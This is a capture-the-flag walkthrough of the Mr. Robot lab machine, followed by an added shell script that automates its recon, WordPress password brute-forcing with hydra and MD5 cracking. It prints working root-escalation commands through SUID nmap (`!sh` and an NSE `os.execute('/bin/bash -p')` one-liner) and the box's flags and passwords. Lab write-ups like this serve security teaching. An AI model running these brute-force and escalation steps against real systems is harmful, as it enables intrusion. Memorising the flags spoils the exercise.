### information_gathering

Ports 443 and 80 are open.

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609000513257-ef58b5b4-bcf4-41c3-97d4-442a527479d3.png#align=left&display=inline&height=317&margin=%5Bobject%20Object%5D&name=image.png&originHeight=634&originWidth=664&size=215534&status=done&style=none&width=332)

robots.txt lists two files: a key file (the first flag, an MD5-looking string) and a dictionary, which is the wordlist used for brute-forcing later.

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609000619048-65118fb1-38c4-4b0e-bf52-868d0b4669ff.png#align=left&display=inline&height=81&margin=%5Bobject%20Object%5D&name=image.png&originHeight=161&originWidth=507&size=15339&status=done&style=none&width=253.5)

flag1:

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609000734914-5ef29e9c-becd-4963-8ff1-e4a7019b9a22.png#align=left&display=inline&height=54&margin=%5Bobject%20Object%5D&name=image.png&originHeight=108&originWidth=562&size=12992&status=done&style=none&width=281)

073403c8a58a1f80d943455fb30724b9

### Establish a foothold

The username is guessed as Elliot, because in the TV series Mr. Robot the protagonist's real name is Elliot. The password is brute-forced against the WordPress login with hydra's http-post-form module, using the dictionary from robots.txt: ER28-0652.

With admin access to WordPress, edit the theme's 404 template page in the theme editor, replace it with a reverse shell, and request a non-existent page to trigger it.

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002096236-a184c59c-4139-4665-8092-667212701784.png#align=left&display=inline&height=256&margin=%5Bobject%20Object%5D&name=image.png&originHeight=512&originWidth=906&size=117138&status=done&style=none&width=453)

-> key2: permission denied (the second key is readable only by the user robot).

Next to it is robot's password stored as an unsalted MD5: c3fcd3d76192e4007dfb496cca67e13b -> abcdefghijklmnopqrstuvwxyz (an unsalted MD5 of a wordlist entry falls to a dictionary attack immediately).

After cracking it, log in as robot and read flag2. login -> robot, key-2 is 822c73956184f694993bede3eb39f959

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002301156-b380bb3f-9be4-4c37-b0f5-89deb106def8.png#align=left&display=inline&height=103&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=373&size=36420&status=done&style=none&width=186.5)

### privilege:

#### way 1

Enumerate SUID binaries:

```
find / -perm -4000 -type f 2>/dev/null
```
![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002346442-1884ad2e-0ec2-401f-8af1-87c21776bed1.png#align=left&display=inline&height=155&margin=%5Bobject%20Object%5D&name=image.png&originHeight=309&originWidth=479&size=46231&status=done&style=none&width=239.5)

Older nmap versions still have an `--interactive` mode that drops into an nmap prompt. Because the binary here is SUID root, running `!sh` at that prompt (the `!` prefix executes a shell command) spawns a root shell, which is the privilege escalation used here.

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002378590-834d9dba-5631-46ed-9be8-3cd2f291ac3d.png#align=left&display=inline&height=230&margin=%5Bobject%20Object%5D&name=image.png&originHeight=460&originWidth=678&size=159375&status=done&style=none&width=339)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002469057-8c89af3c-af25-49ff-a4dd-7792b75cf659.png#align=left&display=inline&height=154&margin=%5Bobject%20Object%5D&name=image.png&originHeight=307&originWidth=627&size=61113&status=done&style=none&width=313.5)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002493313-8e9fbc08-b72b-4fb0-81b7-9f78db8951ed.png#align=left&display=inline&height=143&margin=%5Bobject%20Object%5D&name=image.png&originHeight=285&originWidth=664&size=44826&status=done&style=none&width=332)

#### way 2

An NSE script runs with nmap's effective uid as well, so a one-line Lua script does the same job. Note the `-p`: bash resets its effective uid to the real uid at startup unless told not to, so without it the spawned shell would quietly drop root.

```
echo "os.execute('/bin/bash -p')" > ./exp
nmap --script=./exp
```

This path needs an nmap built with NSE (4.21 and later), while `--interactive` was removed in 5.21, so between them the two ways cover old and new builds. Either way, run `id` afterwards and check for `euid=0`.
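The chain above (recon via robots.txt, wordlist dedupe, the hydra http-post-form brute-force the write-up refers to, the MD5 crack of robot's password, and the SUID scan) collected into shell functions, as an added example that is not code from the original write-up. TARGET (a lab VM address), the listener-free hydra failure string `F=is incorrect` (WordPress's default wrong-password text, to be checked against the real response), and the file names are assumptions; the dedupe and crack functions run offline, the others need the target.

```shell
#!/bin/sh
# Added example, not from the original write-up. TARGET is an assumed lab
# address; the hydra failure string is WordPress's default wrong-password text
# and must be verified against the real login response before trusting results.
set -eu

TARGET="${TARGET:-http://192.168.56.101}"   # assumption: lab VM address

# 1. Recon: fetch robots.txt and download every file it lists.
fetch_robots() {
  curl -s "$TARGET/robots.txt" > robots.txt
  grep -E '^[A-Za-z0-9_.-]+\.(txt|dic)$' robots.txt | while IFS= read -r f; do
    curl -s -o "$f" "$TARGET/$f"
    printf 'downloaded %s (%s bytes)\n' "$f" "$(wc -c < "$f" | tr -d ' ')"
  done
}

# 2. The dictionary from robots.txt is mostly duplicates; dedupe it before
#    hydra so the brute-force does not retry the same password. Prints the count.
dedupe_dict() {            # usage: dedupe_dict raw.dic uniq.dic
  sort -u "$1" > "$2"
  wc -l < "$2" | tr -d ' '
}

# 3. Password brute-force on wp-login.php with hydra's http-post-form module
#    (username already known: Elliot). F= marks the response of a failed login.
wp_bruteforce_pass() {     # usage: wp_bruteforce_pass Elliot uniq.dic
  host="${TARGET#http://}"; host="${host#https://}"
  hydra -l "$1" -P "$2" "$host" http-post-form \
    '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' -t 16
}

# 4. Crack an unsalted "user:md5hex" line (the format of robot's password file)
#    with coreutils only: hash each candidate and compare. Prints user:plaintext.
crack_md5_line() {         # usage: crack_md5_line 'robot:c3fc...' uniq.dic
  user="${1%%:*}"
  want="$(printf '%s' "${1#*:}" | tr 'A-F' 'a-f')"
  while IFS= read -r cand || [ -n "$cand" ]; do
    got="$(printf '%s' "$cand" | md5sum | cut -d' ' -f1)"
    if [ "$got" = "$want" ]; then
      printf '%s:%s\n' "$user" "$cand"
      return 0
    fi
  done < "$2"
  return 1                 # not in the wordlist
}

# 5. Post-foothold: list SUID binaries and, if nmap is among them, print its
#    version so you know whether --interactive (<= 5.21) or --script (>= 4.21) applies.
suid_scan() {
  find / -perm -4000 -type f 2>/dev/null | tee suid.txt
  if grep -q '/nmap$' suid.txt; then
    "$(grep '/nmap$' suid.txt | head -n1)" --version 2>/dev/null | head -n1
  fi
}

case "${1:-}" in
  recon)  fetch_robots ;;
  dedupe) dedupe_dict "$2" "$3" ;;
  brute)  wp_bruteforce_pass "$2" "$3" ;;
  crack)  crack_md5_line "$2" "$3" ;;
  suid)   suid_scan ;;
  *)      : ;;             # no subcommand: only define the functions (sourceable)
esac
```

Typical order on the box: `recon`, `dedupe raw.dic uniq.dic`, `brute Elliot uniq.dic`, then after the reverse shell `crack 'robot:c3fcd3d76192e4007dfb496cca67e13b' uniq.dic` and `suid`. Deduping matters because hydra's runtime scales with the wordlist, and the crack loop is enough here only because the hash is unsalted MD5 of a word that is in the dictionary; anything salted or iterated belongs in hashcat or john instead.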